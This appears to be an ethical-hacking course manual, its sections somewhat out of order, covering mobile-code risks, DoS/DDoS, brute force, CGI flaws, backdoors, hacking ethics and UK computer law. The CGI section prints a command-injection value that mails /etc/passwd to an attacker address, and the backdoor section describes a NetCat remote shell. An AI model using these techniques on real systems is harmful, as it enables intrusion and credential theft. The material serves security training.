ICANN

ICANN

Introduction
ICANN, standing for Internet Corporation for Assigned Names and
Numbers, is a non-profit organization formed in 1998 for the governing
and distribution of IP addresses and domain names.
Domain names are registered with private organizations and managed
by organizations like Nominet (www.nic.uk) in the UK or Internic
(www.internic.net) in the US.
ICANN distributes IP addresses to the three Regional Internet
Registries (RIR’s): ARIN, APNIC and RIPE.

Passive Information Gathering

Passive Information Gathering

The first stage when targeting a company is to gather as much
information as possible without the company knowing. Information
can be gathered from a number of sources and used in subsequent
stages to derive more in depth information useful for an attack.
There are a number of Internet resources that can provide useful
information about the target company. Examples are:
• Regional Internet Registration databases.
• Domain name databases.
• EDGAR database.
• CNN news website.

What is Passive Information Gathering?

At this stage the information gathering is entirely passive. This means
that the company is not contacted or probed directly and will therefore
not be able to detect that anyone is gathering information about them,
even if they have Intrusion Detection Software (IDS) installed. The
information almost invariably comes from third-parties who publish
such information freely on the web.
On the Internet, there are valuable resources that can be used for
passive information gathering. These generally take the form of
databases holding current or archived company information. Because
these databases are publicly accessible, it is not illegal or unethical to
query them. Many such databases provide the facilities and tools to
allow this action. The company's homepage is also a valuable resource
and can potentially reveal sensitive information inadvertently left there
by the author, again without necessarily notifying the target company
that they are being investigated.

HTML Page Examination

HTML Page Examination

HTML pages can be rewritten at the firewall so that no applet tags are
left in the HTML file. This will have the effect that the browser will
never ask for an applet to be fetched across the firewall. The pitfall
associated with this is that JavaScript can be used to build applet tags

on the fly. Although there is no applet tag in the HTML file, the
browser’s executing of JavaScript will cause it to be inserted at the time
the page is viewed.
Conclusion
There is no easy solution to make sure that executable content is
handled - and if necessary intercepted and discarded - in a secure
fashion. The pragmatic advice by most specialists for the moment
seems to be: turn it off. In other words, do not allow Java and ActiveX
applets to pass through the firewall by disabling them in the settings of
the Web browser and wherever it is possible to disallow them. Clearly,
this is just a temporary fix, which has to be examined considering the
future importance of distributed computing environments.

Java Class File Byte Sequence

Java Class File Byte Sequence

Java class files can be recognized by a magic byte sequence that is
required at the beginning of every class file. The pitfall associated with
this is that Java class files may come as part of a compressed archive.
Due to the nature of compression, nothing in the archive (even its name
can be changed) exposes the fact that it contains Java class files. Class
files that are part of an archive cannot be detected by this technique. In
addition, class files may be passed via an encrypted connection, which
will make them indistinguishable from ordinary files to the firewall.

Java Class Extension

Java class files can be recognized by their .class filename extension. The
pitfall associated with this is that depending on the browser, this may
either not be the case, or, again can be circumvented by sending applets
as part of an archive.

ActiveX Security

ActiveX Security
Unlike Java, ActiveX does not have a sandbox in which to confine
potentially dangerous applets. An ActiveX program can do anything
done by other programs, for example:
• Run and delete files
• Send e-mail and faxes
• Activate other programs
Security is based on what is called 'an Authenticode System' and 'Code
Signing'. Unfortunately, the authentication certificates that should
endorse the digital signatures provide little or no assurance
whatsoever, because of the way the certification is implemented. When
an ActiveX-enabled browser runs an ActiveX applet, it:
1. Examines the digital signature.
2. Supposedly verifies the signature.
3. Executes the applet upon verification.
4. Asks for the user's permission to run the applet if the signature is
not pre-authorized.
5. Runs the program without doing any further checks on how the
applet might affect the user's system.
ActiveX Security Summation
Since one cannot have confidence in the authentication mechanism,
applets should be regarded as insecure. Rogue ActiveX applets have
already caused quite a bit of havoc. Examples include Runner, which
starts the command.com program and consequently runs any

command on the PC. Cuss-out goes into the e-mail program and sends
out crude letters to the last ten people who were e-mailed. The nasty
thing is that this usually passes unnoticed unless one gets a response.
Solutions
Suggested solutions have involved the use of firewalls. For instance, a
few techniques were suggested by the Princeton group to detect Java
applets at the firewall and ways to circumvent them:
• Examine byte sequence in Java files.
• Search for .class file extensions.
• Parse HTML pages.

ActiveX

ActiveX

Microsoft’s ActiveX is a programming language used for creating
Windows applets. Applets are compiled, executable binary programs,
which can roughly perform the actions similar to those of a Windows
application within a browser, such as :
• Viewing Microsoft Word and Excel files.
• Invoking VBScript programs
• Manipulating items on a computer including display, files, hard
drive content and CPU activity.
ActiveX is mainly used in Web pages to provide animation and
interaction that occur on the user's PC. ActiveX applets can be links
from:
• HTML files and mark-up tags.
• Text.
• Graphics.

• Audio.
• CGI scripts.
• Other Web pages and Java applets.
As with any executable content, security concerns have to be raised.

Java Sandbox

Java Sandbox

Another layer of security protection is commonly referred to as the
sandbox model: untrusted code is placed in a sandbox, where it can
play safely and without doing any damage to the real world, or the full
Java environment. When an applet or other untrusted code is running
in the sandbox, there are a number of restrictions on what it can do.
The most obvious of these restrictions is that it has no access to the local
file system.
Security Manager
The Security Manager class enforces a number of other restrictions. All
the core Java classes that perform sensitive operations, such as
filesystem access, first have to ask permission of the currently installed
Security Manager. If the call is being made by untrusted code, the
security manager throws an exception, and the operation is not
permitted.
Digital Signatures
Finally, by attaching a digital signature to Java code, the origin of that
code can be established in a cryptographically secure and unforgeable
way. If a person or organization is specified to be trusted, then code

that bears the digital signature of that trusted entitiy, is also trusted,
even when loaded over the network. It may also be run without the
restrictions of the sandbox model.

Java Virtual Machine (JVM)

All in all, Java security is the task of the Java Virtual Machine in the web
browser, which means that once again security is placed in a layer
above the operating system. All now rests on the integrity of that
operating system. Additionally, a lot of bugs have been reported by the
Princeton Secure Internet Programming Group, often consisting of
breaking the type system.

Java Security Summation

It turns out that the security mechanisms described cannot give us
enough assurance. Hence, there are many reasons to stay nervous
about letting applets through a firewall and into a browser. If security
is of paramount importance, applets should be blocked.

Java Security

Java Security

It is interesting to note that until a few years ago, security concerns
were raised about downloading data: do they contain viruses, or maybe
Trojan horses? The advent and popularity of Java has created a new
paradigm: downloaded content can now also be executable.
Java developers have tried to address security by implementing a few
mechanisms, which are supposed to remove the risks of executing
untrusted code:
• Memory access.
• The Java Sandbox.
• The Byte-code Verifier.
• The Applet Class Loader.
• The Security Manager.

Memory Access

Java developers have often promoted Java as a secure language. At the
lowest level, security goes hand in hand with robustness. Java
programs cannot:
• Forge pointers to memory
• Overflow arrays
• Read memory outside the bounds of an array or string

These features are supposed to be the main defences against malicious
code. It has been argued that by disallowing direct access to memory, a
huge, messy class of security attacks is ruled out.
Byte-code Verification
The second line of defence against malicious code is the byte-code
verification procedure that the Java interpreter performs on any
untrusted code it loads. The verification procedure should ensure that
the code is well formed. For example, it should not overflow or
underflow the stack or contain illegal byte-codes. If the byte-code
verification step was skipped, inadvertently corrupted or maliciously
crafted byte-codes might be able to take advantage of implementation
weaknesses in a Java interpreter.

The Dangers of Mobile Code

The Dangers of Mobile Code
General

Because of the universal use of e-mail and WWW, it is impossible for
any security administrator to guarantee that no malicious external files,
programs or data will reach the internal network. Primary culprits for
Web-based intrusions are applications using the Java and ActiveX
programming languages. These languages allow Web sites to
incorporate programs that users can run on their computers, in other
words: remotely compiled programs are executed locally. It is not
surprising that one should be rather nervous about executing untrusted
code on one’s private network or machine.
Java
Java is a high-level, object-oriented, general-purpose programming
language that took the Internet by storm, because it was one of the first
technologies that could animate Web pages and make them interactive.
Designed by Sun Microsystems in 1990, it is similar to C++, but it
eliminates many language features that can cause common
programming errors.
Java source code files (files with a .java extension) are compiled into a
format called bytecode (files with a .class extension), which can then be
executed by a Java interpreter. Java can be used to develop complete
applications, called Java applets, which can perform a variety of tasks
from the same Web page:
• Animations.
• Games.
• Charts.
• Interactive programs.
Let us see how this works in a Web browser on a desktop computer.
References to Java software are embedded on a Web page, which can be
stored on a local disk or on the network. When the browser sees these
references, it performs the following procedure:

• The Java software, i.e. the applet, is loaded.
• The applet is then processed by the Java Virtual Machine (JVM),
which is built into the browser.
• This JVM does stringent security checks.
• The JVM runs the applet, which appears and interoperates inside
the browser.
The computer's operating system provides machine-specific support
for many of the actual operations and interactions.

Backdoor and Trojan Development

Backdoor and Trojan Development

As intrusion detection and Firewalling technologies have improved, so
have the backdoor programs. The simple TCP based remote shell
utilities have been superseded by UDP and ICMP based programs that
support encrypted data channels. The ability to control these backdoors
with UDP packets allows them to be deployed behind firewalls that
allow UDP traffic, typically for DNS on port 53. Similarly, if the Firewall
in question allows ICMP packets through, these can be used to
communicate with the backdoor programs. The use of encrypted data

channels means that intrusion detection software can no longer inspect
the packet data for signatures, making detection of these backdoors
even more difficult.

Deployment

Backdoors can also be deployed on “virgin” systems without having to
first compromise them through other means. This can be accomplished
by imbedding the backdoor in an email attachment, ActiveX control or
a file on the internet. Utilities such as Silkrope and Saranwrap exist,
which allow the attacker to attach the Trojan to a seemingly legitimate
file.
Well known backdoor programs on the Microsoft Windows platform,
include:
• BackOrifice.
• NetBus.

Backdoors and Trojans

Subverting Client Side Scripting

Client side scripting in the form of Java script or VB script is sometimes
used to perform input validation. This has the feature that the user is
immediately notified when incorrect data is entered, and doesn’t have
to wait for the form to be submitted before receiving feedback.
Input validation done at this level presents serious security flaws, as the
client side source code is available and editable by the end user. By
simply removing the restriction on character sets and input length,
buffer overflow and command execution attacks can then be attempted.
Client side input validation should always be used as an added feature
to server side validation and should not be considered a replacement.
Very poorly written client side scripts sometimes contain usernames
and passwords which can be used to gain access to the system.

Backdoors and Trojans

Trojans and backdoor programs are becoming an increasingly popular
method for gaining unauthorized access to remote systems. Backdoors
offer the attacker an easy way of accessing a remote system, without
having to rely on exploits or other security vulnerabilities.
The simplest backdoors take the form of command shells listening on
unusual ports. A commonly used tool is NetCat, which is available on
both the Windows and Unix platforms. Once NetCat is installed and
listening on port XXXX, the attacker need only telnet to port XXXX and
be presented with a remote command shell.

CGI and WWW Services

CGI and WWW Services

As more websites offer interactive services, more CGI and web based
vulnerabilities are being uncovered. CGI vulnerabilities fall into three
categories:
• Buffer overflow.
• Command execution.
• Subverting client side scripting.

Buffer Overflow

Standard buffer overflow techniques can be applied to CGI scripts.
Since scripts allow for user input, this input could be used to overflow
buffers in vulnerable programs. This only affects scripts written in
relatively low level languages such as C. Scripts should always perform
validation on all user input and internal functions should do sanity
checking on the size of buffers. Higher level, and more commonly used
scripting languages perform bounds checking on variable and array
lengths internally and will consequently not be vulnerable to buffer
overflow attack. Examples of such languages are:
• Java.
• Perl.
• Python.

Command Execution

Scripts written in higher level languages sometimes contain more
insidious vulnerabilities than their low level cousins. A common
occurrence of this is command execution on the remote machine. This is
once again caused by poor input validation. For example, CGI scripts
sometimes contain code that executes shell commands such as the Perl
command:
System("mail $email < theTermsAndConditions.txt");
Which is a simple way of mailing a document to a user. In this example
the $email variable will contain an email address that was entered in a
form on the website. If no input validation is done when the user enters
her email address, it will be possible to imbed shell commands into the
input field and have them executed by the system call.
hacker@hack.net < /etc/passwd;
Inserting the above value will cause the password file to be mailed to
the attacker. As with buffer overflow attacks the level of privilege with
which these commands are executed are dependent on the privilege
level of the CGI script.

Brute Force Attacks

Brute Force Attacks

These attacks are aimed at gaining access to a system by repeated
attempts at authentication. Most services that require a username and
password, and have no facility for account lockout, are vulnerable to
this type of attack.
Brute force methods are commonly used to crack password files, as this
can be done reasonably quickly on a local system. Common tools used
in this case are:
• crack - A Unix based program.

• L0phtcrack - A Windows based program.
Attacking network based services can be more time consuming as the
response time will depend heavily on the network load. Tools exist to
crack the following services:
• telnet.
• ftp.
• http.
• CGI logins.
To improve the chances of a successful brute force attack, one part of a
two part authentication is needed. This can be obtained from other
network or system vulnerabilities, e.g. finger or null sessions, or by
“dumpster diving” and other social engineering methods.

Dictionary Attack

Once a username has been established, it is expedient to first try a
dictionary based attack which tries words from various dictionaries
until a match is found. The dictionaries available vary in size and scope
as well as subject. There are specific themes dictionaries available such
as Star Wars dictionaries that can be used in conjunction with other
information to produce a more targeted attack.
Failing a dictionary attack, a true brute force method can be followed,
which attempts every combination of characters from a known subset
until a match is found. This can be very time consuming if this subset is
large or if the minimum password length is relatively long.

Misconfigurations

Misconfigurations

Although exploits feature heavily in security related news, far more
successful attacks are conducted by abusing common
misconfigurations in network services. Network services should

always be configured with a “deny access by default” policy. The
opposite is often the case, which results in a number of services being
vulnerable to malicious attack.
Access controls on network services often lead to further privilege
escalation and eventual compromise of the system. This was illustrated
by the recent successful attack on the Apache web site. The attackers
exploited a poorly configured ftp server, which allowed write access to
the web site. This in turn allowed them to run a script, via the web and
gain remote root access to the system.
By default, certain products, such as Checkpoint's Firewall-1, are
installed with settings that open them up to security vulnerabilities and
have to be specifically reconfigured to ensure their secure operation.

Abuse of Trust

Early networking protocols did not place a lot of emphasis on
encryption and authentication, as they were used in relatively small
networks. As these networks and systems formed part of the Internet, it
became possible to exploit weaknesses in these protocols.
An example is the use of a source IP address as the means of
establishing a trust relationship between two systems. Common attacks
exploit this weakness by spoofing the address of the trusted host and
thereby gain access to the trusting system and its resources. Typical
examples are NFS and the “r” utilities (rsh, rlogin).

Installing DDoS Software

Installing DDoS Software
There is a relatively standard procedure that is followed when
installing the DDoS software in preparation for an attack.
1. Previously compromised hosts have “zombie” agents installed on
them.
2. Another compromised host has the master controlling software
installed on it. This piece of software is configured to be aware of the
location of all the agents.
3. The last step is to install client software on the attacker's machine,
used to initiate the attack.
Initiating the Attack
The attack is typically initiated in the following manner:
1. The client communicates the IP addresses of the desired targets to
the master system.
2. This master system then instructs each of the agents to launch an
attack against the target using standard DoS techniques.
Early detection of these systems was possible by scanning machines for
the presence of agents and by sniffing network traffic to detect the
communication between the master and the agents.
Evolution of DDoS
As the DDoS tools have evolved they now incorporate encryption as
part of the master to agent communication and allow agents to listen
UDP ports, which only respond when sent a shared secret key. These
two enhancements make detecting these systems remotely, a very
difficult task.

The Application Level Program Providing the Service

The Application Level Program Providing the Service

Network applications can be vulnerable to denial of service attacks in
the same way that operating systems are. If no allowances are made for
unexpected traffic or other input, the application could encounter a
condition where it hangs, and can no longer provide the service it was
designed for. Poor error handling in the code could lead to the same
result.
If the operating system does not take adequate precautions for extreme
conditions, it could be vulnerable to an attack that attempts to exhaust
the physical resources available on the system. Several such attacks
have been released which push the CPU to 100 percent utilization, and
thereby deny access to other services.
Distributed Denial of Service (DDoS) Attacks
Otherwise known as DDoS, these attacks have the same goal as
standard Denial of Service attacks but use a different architecture in
achieving it. A single host launching a network or application level
attack against a target is constrained by it's own available network
bandwidth and system resources, a group of machines can be more
effective in a concerted attack. The current DDoS programs publicly
available all use the same basic architecture to control the attack,
common examples being:
• Stacheldraht.
• TFN.
• TFN2K.

Denial of Service (DoS) Attacks

Denial of Service (DoS) Attacks

Denial of Service or DoS attacks result in a specific service being made
unavailable to legitimate users. These attacks typically have one of
three targets:
• The network connection providing access to the service.
• The operating system hosting the service.
• The application level program providing the service.
The Network Connection Providing Access to the Service
By flooding the network with traffic, less bandwidth is available for use
by the service. If enough bandwidth is consumed in this flood, access to
the service could effectively deny service to legitimate users.
Example
A typical example of this is the Smurf attack, where data is sent to the
broadcast address of a network, and the source address of the traffic is
specified as that of the target machine. This results in all the systems on
the network responding to the supposed source at the same time,
thereby generating huge amounts of traffic.
The Operating System Hosting the Service
Operating systems have been found to be vulnerable to denial of
service attacks. In the case of network based attacks this is caused by
the operating system's specific implementation of the networking stack.
A bug in this stack can cause the entire operating system to hang or
reboot when anomalous network traffic is encountered.

Example
A well known example is the Windows NT Out of Bound attack (OOB),
which caused affected systems to produce the “blue screen of death”
when sent specific IP packets.
We can expect to see more vulnerable IP stacks appearing as the market
focus shifts to embedded Internet enabled devices, where each vendor
is using their own implementation of the IP stack.

Attack Types and Vulnerabilities

Attack Types and Vulnerabilities

Introduction

There exist numerous ways to attack a target system. It could be

achieved by exploiting known vulnerabilities in software or taking

advantage of a badly configured security policy; it could be

implemented remotely or internally. The techniques and methods used

are likely to vary depending on the target and they should be chosen

appropriately having assessed the situation fully. The attack types and

vulnerabilities discussed in this module, are:

• Buffer Overflow attacks.

• Denial of Service (DoS) attacks.

• Distributed Denial of Service (DDoS) attacks.

• Misconfigurations.

• Abuse of Trust.

• Brute force attacks.

• CGI and WWW services.

• Back doors and Trojans.

Buffer Overflow Attacks

These attacks exploit poorly written software to allow attackers to

execute arbitrary code on the target system. Overflows can occur in

server software which is available to users over the network, or in

programs which exist on multi-user operating systems. In either case, a

successful overflow will allow the attacker to execute arbitrary code

with the privilege of the vulnerable service.

The most sought after exploits in the hacker community are “remote

root” exploits, however, they are not as common as the local exploits. A

local exploit occurs in a service that is not available over the network,

but is shared by users in a multi-user operating system such as Unix.

This allows for the same escalation of privilege as that provided by the

remote exploits.

Typically Overlooked Issues

Typically Overlooked Issues

We hereby also give a list of issues that will normally not be picked up
in the average security audit. Examples are:
1. DNS Spoofing.
2. Third Party Trust.
3. Custom Trojan Horses.
4. Database.
5. Routing Infrastructure.
6. Testing the IDS.
7. WWW Server Side Includes.
8. TCP Hijacking.
9. Testing the Firewall.
10. ISDN Phone Lines.
11. Network Brute Force Testing.
12. Testing non-IP networks.
13. Ethernet Switch Spoofing.
14. Exploiting Chat Tools.

Conclusion of Hacking

Conclusion of Hacking

On the other hand, using and demonstrating intrusion techniques
should be done with due care, in order not to promote them as a means
to break into other people’s systems. Other sites and system
administrators will take a very dim view of your activities if you decide
to use their hosts for security testing without advance authorization.
They would rightly take legal action against you if they perceive it as an
attack.
Typical scenario
It is always useful to use an external account to look at one’s own
systems from the outside. One of the most rewarding steps usually is to
gather as much information as possible about your own hosts. There is
a wealth of network services to look at: finger, showmount, and rpcinfo
are good starting points, but also look at DNS, whois, sendmail (smtp),
ftp, uucp, and as many other services as you can find.
One of the main issues that is most often overlooked is trust
relationships. There are many situations, for instance, when a server
(note that any host that allows remote access can be called a server) can
permit a local resource to be used by a client without password
authentication when password authentication is normally required.
Performing an assessment on your own systems should uncover such
weak links.
Although the concept of how host trust works is well understood by
most system administrators, the dangers of trust, and the practical
problem it represents, irrespective of hostname impersonation, is one of
the least understood problems we know of on the Internet. What is
rarely understood is how networking so tightly binds security between
what are normally considered disjoint hosts.
It is also interesting to note that common solutions to security problems
such as running Kerberos or using one-time passwords or digital
tokens are ineffective against many forms of attacks. While many of
these security mechanisms do have their use, one should be aware that
they are not a total security solution - they are part of a larger struggle to
defend your
system.

Hacking

Hacking

Introduction
Performing ethical hacking is arguably an unusual approach to system
security. However, performing an ethical hacking exercise, or in other
words, carrying out a security assessment on one’s own systems, has
some great benefits:
Hacker’s View of Security
Instead of merely saying that something is a problem, one actually
looks through the eyes of a potential intruder, and shows why it is a
problem. Such exercises can illustrate that even seemingly harmless
network services can become valuable tools in the search for weak
points of a system, even when these services are operating exactly as
they are intended to. By using techniques real intruders may use, one is
able to get a real-life view on possible access to one’s systems, and the
impact such access may have. Moreover, it can be carried out in a
’friendly’ environment, and using a structured, reproducible approach.
Enhancing IT Staff Security Awareness
System administrators are often unaware of the dangers presented by
anything beyond the most trivial attacks. While it is widely known that
the proper level of protection depends on what has to be protected,
many sites appear to lack the resources to assess what level of host and
network security is adequate. By showing what intruders can do to
gain access to a remote site, one can assist system administrators in
making informed decisions on how to secure their site - or not.
Better Response to Intrusions
Intrusion techniques often leave traces in system auditing logs:
examining them after trying some of these attacks out, is useful to see
what a real attack might look like. It is also useful to examine the results
of two of the most effective methods of breaking into hosts: social
engineering and password cracking.

The Social Protector Argument

The Social Protector Argument

Argument
Hackers point out they break into systems to watch for instances of
data abuse and to help keep ’Big Brother’ at bay. The end justifies the
means.
Counterargument
Criminal activity cannot be condoned for the sake of raising awareness.
The proper authorities should make sure proper data protection and
ethics are enforced.
Conclusion of Ethics
In conclusion, we can state that most computer break-ins are unethical.
On the other hand, any system administrator or security administrator
is allowed to hack into his own systems. But why would he? We will
attempt to give some motivations for that in the next paragraph.

The Security Arguments

The Security Arguments

Argument

According to hackers, actual break-ins illustrate security problems to a
community that will not otherwise notice those very problems.

Counterargument
Reporting and explaining a vulnerability to the owner of a system
would illustrate the problem as well; breaking in cannot be justified.
Should burglars be allowed to break into houses in order to
demonstrate that door locks are not robust enough?
The Idle System Argument
Argument
System hackers often claim they are merely making use of idle
machines. Because a system is not used at any level near capacity, the
hacker is somehow entitled to use it.
Counterargument
Clearly, a remote intruder is not in the position to properly qualify
whether a systems is being underused or not. In any case, unused
capacity is often present for future needs and sudden surges in system
activity.
The Student Hacker Argument
Argument
Some trespassers claim they do no harm, and do not change anything;
they are merely learning how systems and system security work.
Counterargument
Hacking has nothing to do with proper computer science education.
Furthermore, ignorant users can unwittingly severely damage systems
they break into. Also, one cannot expect a system administrator to
verify that a break-in is done for educational purposes, and hence
should not be investigated.

Ethics

Ethics

Introduction

Ethics is defined as ’the discipline dealing with what is good and bad

and with moral duty and obligation’. More simply, one could say it is

the study of what is right to do in a given situation. In the next

paragraph we will highlight why we see ethical hacking - or

performing a security assessment - on one’s own systems, as ’the right

thing to do’, i.e. as an essential part of good security practice.

However, it is interesting to have a closer look first at some of the

motivations (excuses) often put forward by hackers who try to gain

unauthorized access to someone else’s systems. Computer burglars

often present the following reasons in an attempt to rationalize their

activities as morally justified:

The Hacker Ethic

Argument

Many hackers argue they follow an ethic that guides their behavior and

justifies their break-ins. They state that all information should be free,

and hence there is no such thing as intellectual property, and no need

for security.

Counterargument

If all information should be free, privacy is no longer possible.

Additionally, our society is based on information whose accuracy must

be assured, hence free and unrestricted access to such information is

out of the question. Also, information is often collected and developed

at great expense.

Why Should We Care?

Why Should We Care?

Surely with so many regulatory requirements and penalties for the
abuse of computer systems, nobody would dare to compromise your
system and risk heavy fines and/or imprisonment? The fact of the
matter is that cybercrime is on the increase and a successful attack on a
business can have devastating effects.
For instance:
• What is the effect of the publication of the presence of child
pornography on the servers of a supermarket chain?
• How difficult is it to regain a loss of reputation when a Web-site is
'slightly altered'?
• Do we care if my customers cannot buy books for 48 hours and have
their credit card details disclosed?
• Who cares if everyone's last salary review appears on the Intranet?
• What could happen if an outsider could read all your emails or
impersonate the Finance Director?

UK Computer Misuse Act, 1990

1990 Chapter 18
Unauthorized access to computer material:
1.
(1) A person is guilty of an offense if-
(a) he causes a computer to perform any function with the intent
to secure access to any program or data held in any computer,
(b) the access he intends to secure is unauthorized, and
(c) he knows at the time when he causes the computer to
perform the function that that is the case.
(2) The intent a person has to have to commit an offense under this
section need not to be directed at

(a) any particular program or data,
(b) a program or data of any particular kind, or
(c) a program or data held in any particular computer.
(3) A person guilty of an offense under this section shall be liable on
summary conviction to imprisonment for a term not exceeding
six months or to a fine not exceeding level 5 on the standard
scale or to both.
2.
(1) A person is guilty of an offense under this section if he commits
an offense under section 1 above (" the unauthorized access
offense") with intent
(a) to commit an offense to which this section applies; or
(b) to facilitate the commission of such an offense ( whether by
himself or by any other person); and the offense he intends to
commit or facilitate is referred to below in this section as the
further offense.
(2) This section applies to offences
(a) for which the sentence is fixed by law; or
(b) for which a person of twenty-one years of age or over (not
previously convicted) may be sentenced to imprisonment for a
term of five years (or, in England and Wales, might be so
sentenced but for the restrictions imposed by section 33 of the
Magistrates Courts Act 1980).
(3) It is immaterial for the purposes of this section whether the
further offense is to be committed on the same occasion as the
unauthorized access offense or on any future occasion.
(4) A person may be guilty of an offense under this section even
though the facts are such that the commission of the further
offense is impossible.
(5) A person guilty of an offense under this section shall be liable

(a) on summary conviction, to imprisonment for a term not
exceeding the statutory maximum or to both; and
(b) on conviction on indictment, to imprisonment for a term not
exceeding five years or to a fine or to both.
3.
(1) A person is guilty of an offense if -
(a) he does any act which causes an unauthorized modification
of the contents of any computer; and -
(b) at the time when he does the act he has the requisite intent
and the requisite knowledge.
(2) For the purposes of subsection (1)(b) above the requisite intent is
an intent to cause a modification of the contents of any and by so
doing -
(a) to impair the operation of any computer;
(b) to prevent or hinder access to any program or data held in
any computer; or
(c) to impair the operation of any such program or the
reliability of any such data.
(3) The intent need not be directed at-
(a) any particular computer;
(b) any particular program or data or program or data of any
particular kind; or
(c) any particular modification or a modification of any
particular kind.
(4) For the purposes of subsection (1)(b) above the requisite
knowledge is knowledge that any modification he intends to
cause is unauthorized.
(5) It is immaterial for the purposes of this section whether an
unauthorized modification or any intended effect of it of a
kind mentioned in subsection (2) above is, or is intended to
be, permanent or merely temporary.

(6) For the purposes of the Criminal Damage Act 1971 a
modification of the contents of a computer shall not be
regarded as damaging any computer or computer storage
medium unless its effect on that computer or computer
storage medium impairs its physical condition.
(7) A person guilty of an offence under this section shall be
liable-
(a) on summary conviction, to imprisonment for a term not
exceeding six months or to a fine not exceeding the
statutory maximum or to both; and
(b) on conviction on indictment, to imprisonment for a term
not exceeding five years or to a fine or to both.

How much hacking is there?

How much hacking is there?

As we go about our daily lives, more and more of it is recorded or
managed by computer systems we have no control over. Not a week
goes by without some news headline whereby a system has been
compromised and someone's details have been destroyed, manipulated
or used for other means. As a consequence, the last 10 years has seen
the development of many laws that hold and punish those who commit
these computer crimes.
Each year the laws grow stronger, the definitions more exacting, and
the punishments more severe. Chief amongst the targets is the
Computer Hacker, the person who breaks into systems, steals the most
private information and publishes it for all to see.
Just how much computer crime can be attributed to hackers?
According to the Computer Security Institute (1999), these are the types
of computer crime and other losses:
• Human errors - 55%
• Physical security problems - 20% (e.g., natural disasters, power
problems)
• Insider attacks conducted for the purpose of profiting from
computer crime - 10%
• Disgruntled employees seeking revenge - 9%
• Viruses - 4%
• Outsider attacks - 1-3%

Data Protection

Data Protection

The UK Data Protection Act (1984) and the updated 1998 new Data
Protection Act (inspired by a 1995 EU directive) cover the legal aspects
of personal data held by a company and how it may be obtained or
used. They are designed to protect personal privacy and to enable
international free flow of personal data by harmonization. Data users
must register all computerised personal data. The Data Protection
Commissioner enforces this policy.
The Data Protection Act maintains 8 guiding principles; data must be:
• Processed fairly and lawfully (fair collecting principle)
• Obtained and processed for specific purposes
• Adequate, relevant and not excessive
• Accurate and, where necessary, up-to-date
• Kept no longer than necessary
• Processed in accordance with the rights of the data subject

• Kept appropriately secure
• Kept within the EEA, unless protection is adequate

Data Protection

Data Protection

The UK Data Protection Act (1984) and the updated 1998 new Data
Protection Act (inspired by a 1995 EU directive) cover the legal aspects
of personal data held by a company and how it may be obtained or
used. They are designed to protect personal privacy and to enable
international free flow of personal data by harmonization. Data users
must register all computerised personal data. The Data Protection
Commissioner enforces this policy.
The Data Protection Act maintains 8 guiding principles; data must be:
• Processed fairly and lawfully (fair collecting principle)
• Obtained and processed for specific purposes
• Adequate, relevant and not excessive
• Accurate and, where necessary, up-to-date
• Kept no longer than necessary
• Processed in accordance with the rights of the data subject

• Kept appropriately secure
• Kept within the EEA, unless protection is adequate

Computer Fraud

Computer Fraud

The input, alteration, erasure or suppression of computer data or
computer programmes, or other interference with the course of data
processing, that influences the result of data processing thereby causing
economic or possessory loss of property of another person with the
intent of procuring an unlawful economic gain for himself or for
another person, or with the intent to unlawfully deprive that person of
his property.

Computer Forgery

The, input, alteration, erasure or suppression of computer data or
computer programmes, or other interference with the course of data
processing, in a manner or under such conditions, as prescribed by
national law, that it would constitute the offence of forgery if it had
been committed with respect to a traditional object of such an offence.
Damage to Computer Data or Computer

Programmes

The erasure, damaging, deterioration or suppression of computer data
or computer programmes without right.

Computer Sabotage

The input, alteration, erasure or suppression of computer data or
computer programmes, or interference with computer systems, with
the intent to hinder the functioning of a computer or a
telecommunications system.

Unauthorized Access

The access without right to a computer system or network by infringing
security measures.

Unauthorized Interception

The interception, made without right and by technical means, of
communications to, from and within a computer system or network.
In the United Kingdom, crimes that fall into the above categories are
covered by the UK Computer Misuse Act (1990).

Legal and HR Issues

Legal and HR Issues

The law may not be the most precisely sharpened instrument with which to
strike back at hackers…, but sometimes blunt instruments do an adequate job.'
Introduction
As computer and electronic systems have taken a dominant role in the
way businesses now function, the commercial and the public
perception of electronic crime (often referred to a cyber crime) has
resulted in the development of new laws (both domestic and
international) and the instalment of multiple regulatory bodies.
Legal Issues
To protect both public and private interests, a comprehensive
regulatory environment has been developed to include data protection,
computer misuse, controls on cryptography and software copyright.
Some of the legal issues these regulations are designed to cover include:
• Theft.
• Protection of privacy.
• Freedom of information.
• Fair credit reporting/data protection.
• Public decency.
• Telecommunications.
• Computer crime.
Most developed countries now have a law against computer misuse
whereby viruses, unauthorized access and unauthorized alteration are
treated as a criminal offence. Generally, 'unauthorized' also covers
employees deliberately exceeding their authority. However, the
prosecution has to prove the accused knew they were unauthorized.
International Cyber Crime
International cyber crime is broken down into 6 legal areas:

• Computer Fraud
• Computer Forgery
• Damage to Computer data or Computer Programmes
• Computer Sabotage
• Unauthorized Access
• Unauthorized Interception

ANSA - The Adaptive Network Security Alliance

ANSA - The Adaptive Network Security Alliance

ANSA brings ISS’ Adaptive Network Security to a wide range of
network management and security products. ANSA delivers the
flexibility of "best-of-breed" products, enhanced enterprise security,
accelerated implementation of enterprise management and security
solutions, and additional value for existing products and services.

Through ANSA, ISS and its technology partners deliver self-correcting
security and management systems that provide maximum value for
organizations with limited IT security resources. ANSA provides
Adaptive Network Security modules for firewalls, virtual private
networks (VPNs), antivirus/malicious code software, public key
infrastructure (PKI) and enterprise systems management (ESM). For
more information, visit the ANSA web site at http://ansa.iss.net, or
send E-mail to ansa@iss.net.

Consulting and Educational Services

Consulting and Educational Services

ISS’ SAFEsuite delivers years of network security experience in a
structured, easily understood format. ISS increases the value of these
award-winning applications with a full range of professional
consulting services to help each enterprise customer with an
individualized level of care. From overburdened IT staff with limited
network security resources to organizations needing immediate
assistance with a serious breach in security, ISS has experienced
network security professionals ready to assist.

ISS SecureU provides targeted educational programs to meet the needs
of IT security professionals. These programs include courses in the
fundamentals of security and networking, vulnerability management,
threat management and intrusion detection, public key infrastructures,
firewalls, and others. Each course offers the option of certification via
standardized examinations.
Building on the X-Force’s extensive security knowledge, Knowledge
Services offers a range of additional security research and advisory
services. Knowledge Services is a critical element of Internet Security
Systems’ total solution to e-business security.

Security Assessment Services (SAS)

The SAS team provides a comprehensive range of Security Assessments
tailored to fit the requirements of each client. Services range from
secure network architecture and application reviews, through to
penetration testing and Ethical Hacking programs. SAS continues to
prove that the combination of top security consultants, structured
assessment methodologies and utilization of leading edge hacking
developments provide the most detailed security assessment and best
value service currently available on the market.
The SAS consultants are responsible for providing all the information
contained within this Ethical Hacking course and for consistently
